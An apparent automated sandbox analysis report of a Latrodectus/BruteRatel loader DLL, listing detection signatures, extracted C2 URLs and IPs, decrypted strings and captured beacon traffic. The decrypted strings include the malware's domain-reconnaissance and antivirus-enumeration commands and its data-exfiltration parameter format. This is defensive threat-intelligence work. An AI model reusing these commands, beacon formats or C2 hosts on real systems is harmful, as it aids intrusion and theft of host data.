Windows Analysis Report
vierm_soft_x64.dll.dll

Overview

General Information

Sample name:	vierm_soft_x64.dll.dll (renamed file extension from exe to dll)
Original sample name:	vierm_soft_x64.dll.exe
Analysis ID:	1525190
MD5:	b1ca25f5bb4edd293b3711c77eb99a6f
SHA1:	178bba8686ea329b884a652fe0f8a0ae0c53d367
SHA256:	97a6331239d451d7dfe15bfe17de8b419df741ae68bacd440808f8b8d3f99b8a
Tags:	BruteRatelBruteRatelexeuser-k3dg3___
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Bazar Loader

Yara detected BruteRatel

Yara detected Latrodectus

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sample uses string decryption to hide its real strings

Sets debug register (to hijack the execution of another thread)

Sigma detected: RunDLL32 Spawning Explorer

Uses known network protocols on non-standard ports

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Brute Ratel C4, BruteRatel	Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.	No Attribution	https://0xdarkvortex.dev/hiding-in-plainsight/ https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name	Description	Attribution	Blogpost URLs	Link
Latrodectus, Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/ https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ https://any.run/malware-trends/latrodectus https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Signatures

AV Detection

Found malware configuration

Source: 30.2.explorer.exe.89d0000.0.raw.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c ipconfig /all
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c systeminfo
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c nltest /domain_trusts
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c net view /all
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c net view /all /domain
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &ipconfig=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c net config workstation
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c whoami /groups
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &systeminfo=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &domain_trusts=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &domain_trusts_all=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_view_all_domain=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_view_all=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_group=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &wmic=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_config_ws=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_wmic_av=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &whoami_group=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "pid":
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%d",
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "proc":
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%s",
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "subproc": [
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &proclist=[
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "pid":
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%d",
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "proc":
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%s",
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "subproc": [
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &desklinks=[
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: .
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%s"
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Update_%x
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Custom_update
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: .dll
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: .exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Error
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: runnung
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %s/%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: front
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /files/
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Alpha
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Cookie:
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: POST
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: GET
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: curl/7.88.1
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: CLEARURL
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: URLS
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: COMMAND
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: ERROR
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: [{"data":"
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "}]
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &dpost=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: https://isomicrotich.com/test/
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: https://opewolumeras.com/test/
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: \*.dll
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: AppData
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Desktop
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Startup
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Personal
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Local AppData
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %s%d.dll
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: <!DOCTYPE
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Content-Length: 0
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: <html>
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Content-Type: application/dns-message
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: 12345
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: 12345
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &stiller=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %s%d.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %x%x
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &mac=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %02x
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: :%02x
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &computername=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &domain=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: LogonTrigger
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: \Registry\Machine\
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: TimeTrigger
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: PT0H%02dM
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: PT0S
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: \update_data.dat

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49773 version: TLS 1.2

Source:	Binary string: kernel32.pdbUGP source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.1376710622.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1415603065.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1417110861.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.1427586345.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1403034734.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.1428897792.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000017.00000002.2565190812.000000018005F000.00000002.00000001.01000000.00000003.sdmp, vierm_soft_x64.dll.dll
Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\explorer.exe	Code function: 30_2_089DA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,		30_2_089DA8E0
Source: C:\Windows\explorer.exe	Code function: 30_2_089D2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,		30_2_089D2B28

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49779 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49789 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49774 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49782 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49781 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49773 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49793 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49784 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49787 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49777 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49790 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49788 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49780 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49795 -> 188.114.96.3:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 82.115.223.39 8041	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 443
Source: C:\Windows\System32\rundll32.exe	Network Connect: 80.78.24.30 8041	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://isomicrotich.com/test/
Source: Malware configuration extractor	URLs: https://opewolumeras.com/test/

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49797

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.9:49718 -> 80.78.24.30:8041
Source: global traffic	TCP traffic: 192.168.2.9:49722 -> 82.115.223.39:8041

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 82.115.223.39 82.115.223.39
Source: Joe Sandbox View	IP Address: 80.78.24.30 80.78.24.30

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: MIDNET-ASTK-TelecomRU MIDNET-ASTK-TelecomRU
Source: Joe Sandbox View	ASN Name: CYBERDYNELR CYBERDYNELR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFh9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
